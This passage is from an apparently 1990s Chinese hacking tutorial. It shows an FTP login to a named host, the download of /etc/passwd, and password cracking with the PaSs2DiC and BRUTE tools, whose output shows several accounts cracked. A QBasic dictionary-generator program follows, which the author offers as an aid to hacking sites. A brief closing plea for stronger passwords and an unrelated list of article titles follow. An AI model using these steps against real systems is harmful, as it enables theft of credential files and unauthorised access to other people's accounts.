(还是使用刚刚的帐号进入)

Name (www.coffee.com.tw:YourName): coffee

331 Password required for coffee.

Password:

230 User coffee logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

(直接到达档案放置地点)

ftp> cd /etc

250 CWD command successful.

ftp> ls

200 PORT command successful.

150 Opening ASCII mode data connection for file list.

ttys

fdprm

group

issue

motd

mtools

profile

securetty

shells

termcap

skel

csh.cshrc

csh.login

lilo

inet

default

services

HOSTNAME

DIR_COLORS

passwd

passwd.OLD

wtmp

utmp

gettydefs

inittab.gettyps.sample

ld.so.conf

ld.so.cache

at.deny

fs

magic

rc.d

syslog.conf

printcap

inittab

sudoers

vga

diphosts

mail.rc

ppp

NNTP_INEWS_DOMAIN

sendmail.st

NETWORKING

gateways

bootptab

exports

ftpusers

host.conf

hosts

hosts.allow

hosts.deny

hosts.equiv

inetd.conf

named.boot

networks

nntpserver

protocols

resolv.conf

rpc

ftpaccess

hosts.lpd

ftpconversions

snooptab

msgs

ftpgroups

slip.login

slip.hosts

yp.conf.example

X11

lilo.conf

sendmail.cf

fstab

fastboot

mtab

syslog.pid

klogd.pid

shutdownpid

localtime

passwd.old

ioctl.save

psdevtab

ftp.banner

ftp.deny

issue.net

motd.bak

securetty.old

226 Transfer complete.

(取回该档案)

ftp> get passwd

200 PORT command successful.

150 Opening BINARY mode data connection for passwd (4081 bytes).

226 Transfer complete.

4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(尽速离开)

ftp> bye

221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧 !!

快点跑一下, 让它自动产生字典档案:

C:/hack>pass2dic

PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file

[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd

Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin   E-Mail: fetag@stsvr.showtower.com.tw

FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:/hack>

(这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force 看看!)

C:/hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine.  v2.0

Copyright (C) 1990, Prometheus.  DOS-fastcrypt made available by sir hackalot.

阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐

Attempts/Hits:  5184/9

Taking list input from dic.cfe

Beginning search of passwd for password: xxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password xxxxx found!  Username: xxxxx

Match for password xxx found!  Username: xxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password coffee found!  Username: coffee

Match for password xxxxxxx found!  Username: xxxxxxx

Match for password xxx found!  Username: xxx

Match for password xxxx found!  Username: xxxx

Done.

C:/hack>

看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是....@#$%^...&* 因某些关系

所以其它部份要被 "马赛克" 起来, 请各位读者见量!

**** 再谈密码 ****

看了以上的破解示范, 就可以  解到许多人还是对於 "密码" 这东西不是很有 "密码" 的观念, 人就是

那么的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用 QBasic 来设计

一个自动产生密码的小程式, 相信对许多人有很大的帮助, 底下我们再来浅显的介绍一下字母密码的

产生方法, 相信对於你在 Hack 某站会有更大的帮助.

事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大", 而让我有了写这一段的

想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆), 并且写出来让大家

解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了, 而且语法大家也可能会比较

熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用, 而不会去修改或者写个好一点的出来!

先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式, 所以我们要  解字的字母排

列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:

[1] apple   [2] guest  [3] james  [4] superman  [5] password

OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 ! 我们首先这样说明: 母音在英文

上有 : A E I O U 这五个, 所有的英文单字都会有这些母音 (有些没有的可能是专有名词或缩写), 也有可

能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再来就是比较每个字的开头, 有可能是母音,

也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是两个子音再接一个母

音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st,

sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e; est; ord; ard; ls; es; s...

等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !! 我大略写一个简单的, 其它大家

自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !!

底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120 个字的字典!!

--------------- MakeDic.BAS Start Here ---------------------------------------------------------------------------------------

DIM FirstWord$(20)

DIM MotherWord$(13)

DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k"

DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"

DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20

READ FirstWord$(I)

PRINT FirstWord$(I)

NEXT I

FOR I = 1 TO 13

READ MotherWord$(I)

NEXT I

FOR I = 1 TO 12

READ LastWord$(I)

NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20

FOR J = 1 TO 13

FOR K = 1 TO 12

PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)

NEXT K

NEXT J

NEXT I

CLOSE : END

--------------- Cut Here, End of MakeDic.BAS --------------------------------------------------------------------------------

当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如: 子音+母音+子音+母音+子音, 作

出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式, 写好了请 Mail 一

份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !! 还是你只是要给我 ?!

希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看, 如果有相同的请

赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP 们.... 教教你们的使用者吧..... 唉~~~~

coolfire文章之三相关推荐

  1. 一步步实现windows版ijkplayer系列文章之三——Ijkplayer播放器源码分析之音视频输出——音频篇

    https://www.cnblogs.com/harlanc/p/9693983.html 目录 OpenSL ES & AudioTrack 源码分析 创建播放器音频输出对象 配置并创建音 ...

  2. 基于阿里云服务器环境搭建到项目上线系列文章之三——安装git

    基于阿里云服务器环境搭建到项目上线系列 前言:最近购买了域名和一台阿里云服务器准备做点东西放上去,所以准备把环境搭建到项目上线的过程记录下来,计划一个系列6篇文章 基于阿里云服务器环境搭建到项目上线系 ...

  3. 【J2me3D系列学习文章之三】(立即模式)对立方体进行变换操作-旋转、缩放、平移...

     本文源地址:http://blog.csdn.net/xiaominghimi/archive/2010/12/09/6064367.aspx  Himi  原创, 转载请注明! 谢谢. 上一篇文章 ...

  4. 高可用系列文章之三 - NGINX 高可用实施方案

    前文链接 高可用系列文章之一 - 概述 - 东风微鸣技术博客 (ewhisper.cn) 高可用系列文章之二 - 传统分层架构技术方案 - 东风微鸣技术博客 (ewhisper.cn) 四 NGINX ...

  5. Web Service 开发系列文章之三(一个较小的契约优先的Web Service例子,用JavaApplication发布)...

    Web Service 学习第三期 1.编写纯WSDL的web服务 1.1.新建目录及WSDL文件 1.2.编写WSDL 1.2.1.编写type <wsdl:types> <xsd ...

  6. Excel与PowerBI 之PowerQuery 编辑界面异同-PowerQuery 系列文章之三

    谈完了基本数据导入界面,接下来我们来谈下我们的PowerQuery 的基本界面. 在Excel中,PowerQuery的入口没有像PowerBI那么容易找到,我们要翻山越岭,然后找到一个菜单,才能够进 ...

  7. 雷达基础系列文章之三:频率捷变雷达(FAR)

    参考:<频率捷变雷达>茅于海  1981年 1.频率捷变雷达(Frequency Agility Radar)的原理 FAR是脉冲雷达,其发射相邻脉冲或相邻脉冲组的载波频率在一定范围内快速 ...

  8. T4系列文章之三:介绍T4语法

    T4语言的语法很简单,可以说一学就会.它不像C#或Java一样有那么多的限制,所以,只要会C#语音,然后再学习一些T4应该注意的地方,那么就OK了. T4模板的基本结构可以分成5类:指令块(Direc ...

  9. PHP 使用 hprose RPC 服务 系列文章之二——Codeigniter3中使用Hprose

    PHP 使用 hprose RPC 服务 系列文章之一--安装扩展 PHP 使用 hprose RPC 服务 系列文章之二--Codeigniter3中使用Hprose PHP 使用 hprose R ...

  10. 一步步实现windows版ijkplayer系列文章之二——Ijkplayer播放器源码分析之音视频输出——视频篇...

    一步步实现windows版ijkplayer系列文章之一--Windows10平台编译ffmpeg 4.0.2,生成ffplay 一步步实现windows版ijkplayer系列文章之二--Ijkpl ...

最新文章

  1. js 数组,字符串,JSON,bind, Name
  2. java jvm 参数 -Xms -Xmx -Xmn -Xss 调优总结
  3. Winform中设置BackgroundWorker在取消时关闭后台进程
  4. python第三方库文件传输_python3 post方式上传文件。
  5. java反序列化漏洞 tomcat_CVE-2020-9484 Apache Tomcat反序列化漏洞浅析
  6. Serverless 实战 —— Funcraft + OSS + ROS 进行 CI/CD
  7. 坦克大战java_清华毕业大佬用一个坦克大战项目讲完了23种设计模式
  8. html链接增加参数,插入当前URL到@ Html.RouteLink参数来建立一个链接
  9. mysql Split函数
  10. 阿里云ECS服务器自定义端口无法访问问题记录
  11. 最最最最最最最最基础的C---函数
  12. (一)NIST CSF-框架介绍
  13. 雨滴桌面显示html,如何用雨滴桌面设置美观的桌面天气插件
  14. 教你几招提高自媒体文章原创度
  15. MVC/POJO/POJI/DAO/DTO/VO
  16. 小说网站源码+采集器+App端
  17. 【《Unity Shader入门精要》 提炼总结】(十三)第十三章·透明度测试的Shader实现透明度混合的Shader实现
  18. UC/OS II 任务管理(4)之任务创建
  19. java毕业设计车牌信息管理系统Mybatis+系统+数据库+调试部署
  20. 国内外计算机科学与技术发展前景,计算机科学与技术的现状及发展趋势

热门文章

  1. visio阵列_什么软件可以画这种图,Visio怎么画?
  2. PMP不报培训班的通过率高吗?
  3. LM324运放作为比较器输出不稳定问题的探讨
  4. 麟龙指标通达信指标公式源码_麟龙四量图通达信指标公式源码
  5. 精读CSS权威指南第四版(1)
  6. CFree 5.0最新注册码
  7. C-Free 5.0注册码
  8. 电影院开工在即,第一部电影就看他
  9. Java程序设计(基础)- 概述
  10. 基于Python的文本分析